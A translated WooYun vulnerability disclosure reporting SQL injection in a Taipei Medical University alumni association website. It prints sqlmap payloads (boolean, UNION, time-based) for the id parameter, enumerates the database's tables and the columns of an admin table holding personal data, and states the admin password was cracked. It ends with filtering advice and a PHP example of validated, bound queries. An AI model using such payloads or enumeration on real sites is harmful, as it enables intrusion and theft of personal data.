WooYun (WooYun.org) historical vulnerability lookup: http://wy.zone.ci/
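2016-01-14: Details reported to the vendor; awaiting vendor handling
2016-01-14: Vendor confirmed; details disclosed to the vendor only
2016-01-24: Details disclosed to core white hats and experts in related fields
2016-02-03: Details disclosed to regular white hats
2016-02-13: Details disclosed to intern white hats
2016-02-27: Details disclosed to the public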
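SQL injection in the Taipei Medical University School of Medicine Alumni Association website (large volume of user information and site administration logs exposed)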
Taipei Medical University School of Medicine Alumni Association: **.**.**.**
Injection point: http://**.**.**.**/News_info.php?id=24
```
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=24 AND 4262=4262

    Type: UNION query
    Title: MySQL UNION query (NULL) - 6 columns
    Payload: id=-4137 UNION ALL SELECT NULL,NULL,CONCAT(0x71636d6671,0x47697478706a66614c73,0x71646b6271),NULL,NULL,NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=24 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0.11
```
Current database:
```
current database: 'tmumsorg_manager'
```
Table enumeration results:
```
Database: tmumsorg_manager
[12 tables]
+----------------+
| admin          |
| contact_us     |
| forums         |
| forums_detail  |
| member_type    |
| news           |
| newsletter     |
| no_member      |
| northtreatment |
| photo          |
| pub_species    |
| publication    |
+----------------+
```
```
Database: tmumsorg_manager
Table: admin
[24 columns]
+-------------+------------------+
| Column      | Type             |
+-------------+------------------+
| date        | date             |
| identity    | text             |
| position    | text             |
| account     | text             |
| address     | text             |
| addressx    | text             |
| alumnus     | text             |
| birthday    | date             |
| category    | text             |
| donation    | text             |
| due         | text             |
| educational | text             |
| email       | text             |
| fax         | text             |
| grp         | text             |
| id          | int(10) unsigned |
| info        | text             |
| name        | text             |
| password    | text             |
| phone       | text             |
| sex         | text             |
| status      | text             |
| telphone    | text             |
| title       | text             |
+-------------+------------------+
```
Cracked the admin password, which allows logging in to the back end; did not dig any further.
Filter the input.
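An added example (not code from the report or from the affected site) of the filtering recommended above for the id parameter of News_info.php, shown beside the concatenation pattern that lets the reported boolean-based payload work. It goes one step beyond filtering by also binding the value as a query parameter; the news table, its columns, the function names and the in-memory SQLite database are assumptions made for the demo.

```php
<?php
// Added example, not the site's code. Assumptions: PDO with the pdo_sqlite driver;
// in-memory SQLite stands in for MySQL; the "news" table and its columns are hypothetical.
declare(strict_types=1);

$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)');
$pdo->exec("INSERT INTO news VALUES (24, 'constructed sample row')");

// Vulnerable pattern: the raw parameter is concatenated into the SQL text,
// so "24 AND 4262=4262" is parsed as SQL and the client-supplied condition runs.
function fetch_news_unsafe(PDO $pdo, string $rawId): ?array
{
    $row = $pdo->query('SELECT id, title FROM news WHERE id = ' . $rawId)
               ->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Hardened pattern: allow-list validation first, then a bound parameter.
function fetch_news_safe(PDO $pdo, string $rawId): ?array
{
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null; // malformed id: answer 404, never build a query from it
    }
    $stmt = $pdo->prepare('SELECT id, title FROM news WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// '24' is a legitimate request; the second value is the boolean payload quoted in the report.
foreach (['24', '24 AND 4262=4262'] as $input) {
    printf("%-18s unsafe=%s safe=%s\n", $input,
        fetch_news_unsafe($pdo, $input) === null ? 'no row' : 'row',
        fetch_news_safe($pdo, $input) === null ? 'rejected' : 'row');
}
```

In the concatenated version the payload is indistinguishable from a normal request, which is what makes it usable as a boolean oracle; the validated version never lets it reach the database.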
Severity: High
Vulnerability Rank: 17
Confirmed: 2016-01-14 23:27
Thank you for the report.
None at this time.